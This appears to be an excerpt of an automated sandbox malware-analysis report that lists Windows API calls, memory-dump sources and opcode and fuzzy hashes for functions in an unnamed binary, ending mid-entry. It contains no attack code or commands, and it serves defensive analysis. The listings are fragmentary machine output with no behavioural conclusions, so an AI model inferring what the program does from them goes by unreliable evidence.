                                                                                                                  • Instruction Fuzzy Hash: 30819B71504201AFC710EF64DC99F6BB7A9EB84720F14861DF55A9B2A2EB70DD04CBB2
                                                                                                                  APIs
                                                                                                                  • __mtinitlocknum.LIBCMT ref: 00D9B744
                                                                                                                    • Part of subcall function 00D98A0C: __FF_MSGBANNER.LIBCMT ref: 00D98A21
                                                                                                                    • Part of subcall function 00D98A0C: __NMSG_WRITE.LIBCMT ref: 00D98A28
                                                                                                                    • Part of subcall function 00D98A0C: __malloc_crt.LIBCMT ref: 00D98A48
                                                                                                                  • __lock.LIBCMT ref: 00D9B757
                                                                                                                  • __lock.LIBCMT ref: 00D9B7A3
                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00E26948,00000018,00DA6C2B,?,00000000,00000109), ref: 00D9B7BF
                                                                                                                  • RtlEnterCriticalSection.NTDLL(8000000C), ref: 00D9B7DC
                                                                                                                  • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00D9B7EC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1422805418-0
                                                                                                                  • Opcode ID: fae359729427ddb94a7979b9ad217481897c16edc9e22820e0e26370988ee04f
                                                                                                                  • Instruction ID: 5a14addc32bcd70d90f26b6b1212f50c944f1df0a3c283fcf6dd5691528e0177
                                                                                                                  • Opcode Fuzzy Hash: fae359729427ddb94a7979b9ad217481897c16edc9e22820e0e26370988ee04f
                                                                                                                  • Instruction Fuzzy Hash: 8C411471D003159BEF10DFA8EA443A8BBA4EF85735F16831AE425AB2D1C7749905CBB0
                                                                                                                  APIs
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00DBA1CE
                                                                                                                    • Part of subcall function 00D9010A: std::exception::exception.LIBCMT ref: 00D9013E
                                                                                                                    • Part of subcall function 00D9010A: __CxxThrowException@8.LIBCMT ref: 00D90153
                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00DBA205
                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 00DBA221
                                                                                                                  • _memmove.LIBCMT ref: 00DBA26F
                                                                                                                  • _memmove.LIBCMT ref: 00DBA28C
                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00DBA29B
                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00DBA2B0
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DBA2CF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 256516436-0
                                                                                                                  • Opcode ID: 803dea8b36ecce52ae94b723f8f2523c217f7a11679cefc6714f50ef5e18ef95
                                                                                                                  • Instruction ID: ced792ce3bd4ebe1c5b8497455aa4eeeb379f71732e46accee4a782753a98e14
                                                                                                                  • Opcode Fuzzy Hash: 803dea8b36ecce52ae94b723f8f2523c217f7a11679cefc6714f50ef5e18ef95
                                                                                                                  • Instruction Fuzzy Hash: 1E318331900205EFCF00EF99DC85AAEBBB9EF45710B148065F905EB256D770D915CBB5
                                                                                                                  APIs
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DD8CF3
                                                                                                                  • GetDC.USER32(00000000), ref: 00DD8CFB
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DD8D06
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00DD8D12
                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00DD8D4E
                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DD8D5F
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00DDBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00DD8D99
                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DD8DB9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3864802216-0
                                                                                                                  • Opcode ID: 4387d0b119d2b58573a7cc6f9b66f3b481c195e1594e7b75888426c28b2695f7
                                                                                                                  • Instruction ID: 9b65f048260b09b50a7b1a2faae62b740b4d04ad2fceb08328c98389170d342c
                                                                                                                  • Opcode Fuzzy Hash: 4387d0b119d2b58573a7cc6f9b66f3b481c195e1594e7b75888426c28b2695f7
                                                                                                                  • Instruction Fuzzy Hash: 9D317C72201214BFEB118F50CC8AFFA3BAEEF4A755F088055FE08DA291CA759841CB70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                    • Part of subcall function 00D73BCF: _wcscpy.LIBCMT ref: 00D73BF2
                                                                                                                  • _wcstok.LIBCMT ref: 00DC1D6E
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC1DFD
                                                                                                                  • _memset.LIBCMT ref: 00DC1E30
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                  • String ID: X$t:
                                                                                                                  • API String ID: 774024439-4137454495
                                                                                                                  • Opcode ID: 5f7ef2f6cb080758c91b24183cedb203040040d5341a6bed9e85a0b47315e6cb
                                                                                                                  • Instruction ID: 91f7c8bcb95c8aba27e322895577e85429a5a7fdcc88dd3430f9e51b2d7b0148
                                                                                                                  • Opcode Fuzzy Hash: 5f7ef2f6cb080758c91b24183cedb203040040d5341a6bed9e85a0b47315e6cb
                                                                                                                  • Instruction Fuzzy Hash: FDC14D355083119FC724EF24C895E5AB7E4EF85310F14892DF99A972A2EB70ED05CBB2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 50ab54ec158de37b2c9b0ab3e8c2207d46fa95481073e495993fb912f8657e67
                                                                                                                  • Instruction ID: 356e3db60e8a5140d2bd261abe28a054c098856cba5d0422a795389ac5b66ea2
                                                                                                                  • Opcode Fuzzy Hash: 50ab54ec158de37b2c9b0ab3e8c2207d46fa95481073e495993fb912f8657e67
                                                                                                                  • Instruction Fuzzy Hash: BA715A71900609EFCB04EF99CC89ABEBF75FF85324F24815AF955AA251C7309A42CB70
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DD214B
                                                                                                                  • _memset.LIBCMT ref: 00DD2214
                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00DD2259
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                    • Part of subcall function 00D73BCF: _wcscpy.LIBCMT ref: 00D73BF2
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00DD2320
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00DD232F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 4082843840-2766056989
                                                                                                                  • Opcode ID: adbd08ed001671607ea97a8ddbb788535277d8e7e73589755eb7fd619abe3da8
                                                                                                                  • Instruction ID: 86bc03d1a535f28e560431c357f8fc4e0d1b97e093788c9797e8e2571e9671d1
                                                                                                                  • Opcode Fuzzy Hash: adbd08ed001671607ea97a8ddbb788535277d8e7e73589755eb7fd619abe3da8
                                                                                                                  • Instruction Fuzzy Hash: DA716C75A00619DFCF04EFA4C9859AEBBF5FF48310B14805AE859AB351DB30AE40CBB0
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(?), ref: 00DB481D
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00DB4832
                                                                                                                  • SetKeyboardState.USER32(?), ref: 00DB4893
                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00DB48C1
                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00DB48E0
                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00DB4926
                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00DB4949
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 87235514-0
                                                                                                                  • Opcode ID: 16a29868abbfe49ead0785accee6d8cc59e79a1a3ea8e6b217fb2cff7c0f5000
                                                                                                                  • Instruction ID: 12bf246f57e4a92458b7b1dd4430914da6365e6483aba74706cba07b9684f0b9
                                                                                                                  • Opcode Fuzzy Hash: 16a29868abbfe49ead0785accee6d8cc59e79a1a3ea8e6b217fb2cff7c0f5000
                                                                                                                  • Instruction Fuzzy Hash: 1F51B0A06087D5BDFF3686248845BFBBEA95F06304F0C858DE1D6969C3C6D8E884DB71
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(00000000), ref: 00DB4638
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00DB464D
                                                                                                                  • SetKeyboardState.USER32(?), ref: 00DB46AE
                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00DB46DA
                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00DB46F7
                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00DB473B
                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00DB475C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 87235514-0
                                                                                                                  • Opcode ID: 94c14829f5ba3c73cd92c8185e69058082f272c54316f27157f629682f11d0bb
                                                                                                                  • Instruction ID: dee8bf928a978a84591aee9e06e317bb7e3eab5232dfefbb6310a6cd2d467fd2
                                                                                                                  • Opcode Fuzzy Hash: 94c14829f5ba3c73cd92c8185e69058082f272c54316f27157f629682f11d0bb
                                                                                                                  • Instruction Fuzzy Hash: 3451A2A05047D5B9FB36C7248C55BFABFA99B06304F0C8489E1D686883D794EC98D771
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsncpy$LocalTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2945705084-0
                                                                                                                  • Opcode ID: 1ec4d83b740c6cb13e0f252c9e44671fe66f49c32ae46773699d4ac443a3ab38
                                                                                                                  • Instruction ID: f464ec68121e78e176a36a613e6928657577919a9173d5888f1543c22140469f
                                                                                                                  • Opcode Fuzzy Hash: 1ec4d83b740c6cb13e0f252c9e44671fe66f49c32ae46773699d4ac443a3ab38
                                                                                                                  • Instruction Fuzzy Hash: 5D414D69D10214B6CF11EBB8C886ADEB7ACEF05310F508866E555F3222EA30E655C7F5
                                                                                                                  APIs
                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00DD3C92
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DD3CBC
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00DD3D71
                                                                                                                    • Part of subcall function 00DD3C63: RegCloseKey.ADVAPI32(?), ref: 00DD3CD9
                                                                                                                    • Part of subcall function 00DD3C63: FreeLibrary.KERNEL32(?), ref: 00DD3D2B
                                                                                                                    • Part of subcall function 00DD3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00DD3D4E
                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DD3D16
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 395352322-0
                                                                                                                  • Opcode ID: b1736b51668cb338188af47637d8481073899f30bd7c1db44c827cfd23dfd064
                                                                                                                  • Instruction ID: 03f6a251ee2532f1e85abcc6ee76ac2ad924db91e94dd314c8314e413d5237fd
                                                                                                                  • Opcode Fuzzy Hash: b1736b51668cb338188af47637d8481073899f30bd7c1db44c827cfd23dfd064
                                                                                                                  • Instruction Fuzzy Hash: D43107B1911209BFDB149B94DC89AFEB7BEEF08300F14416AE512E2250EA709F49DB71
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00DD8DF4
                                                                                                                  • GetWindowLongW.USER32(017AB198,000000F0), ref: 00DD8E27
                                                                                                                  • GetWindowLongW.USER32(017AB198,000000F0), ref: 00DD8E5C
                                                                                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00DD8E8E
                                                                                                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00DD8EB8
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00DD8EC9
                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DD8EE3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2178440468-0
                                                                                                                  • Opcode ID: ea8b729462b1171e6ccecbdcafc2c3477cb49b85e30b30b1f1f4b6d995822d9a
                                                                                                                  • Instruction ID: 72207415a28ad21f255ece42594fddd56483db9303a4af6dda5c1f3ffeb5057b
                                                                                                                  • Opcode Fuzzy Hash: ea8b729462b1171e6ccecbdcafc2c3477cb49b85e30b30b1f1f4b6d995822d9a
                                                                                                                  • Instruction Fuzzy Hash: 4D313631600214AFDB26DF59DC84F653BA6FB4A314F1941AAF505CB3B2CB72A840EF60
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB1734
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB175A
                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00DB175D
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00DB177B
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00DB1784
                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 00DB17A9
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00DB17B7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3761583154-0
                                                                                                                  • Opcode ID: 2a1032c49f4302918f859f62e2266ab4fb0bc37802898f0e41e595d219b61a98
                                                                                                                  • Instruction ID: 6868e08cb3d2007d201129d044e5dfb1a2bed149223f67605001a02f9de1bb29
                                                                                                                  • Opcode Fuzzy Hash: 2a1032c49f4302918f859f62e2266ab4fb0bc37802898f0e41e595d219b61a98
                                                                                                                  • Instruction Fuzzy Hash: 1A215179600319EF9B109BA8DC98DFF77EEEB09360B448125F916DB290DA70EC4187B0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D731DA
                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00DB6A2B
                                                                                                                  • _wcscmp.LIBCMT ref: 00DB6A49
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00DB6A62
                                                                                                                    • Part of subcall function 00DB6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00DB6DBA
                                                                                                                    • Part of subcall function 00DB6D6D: GetLastError.KERNEL32 ref: 00DB6DC5
                                                                                                                    • Part of subcall function 00DB6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00DB6DD9
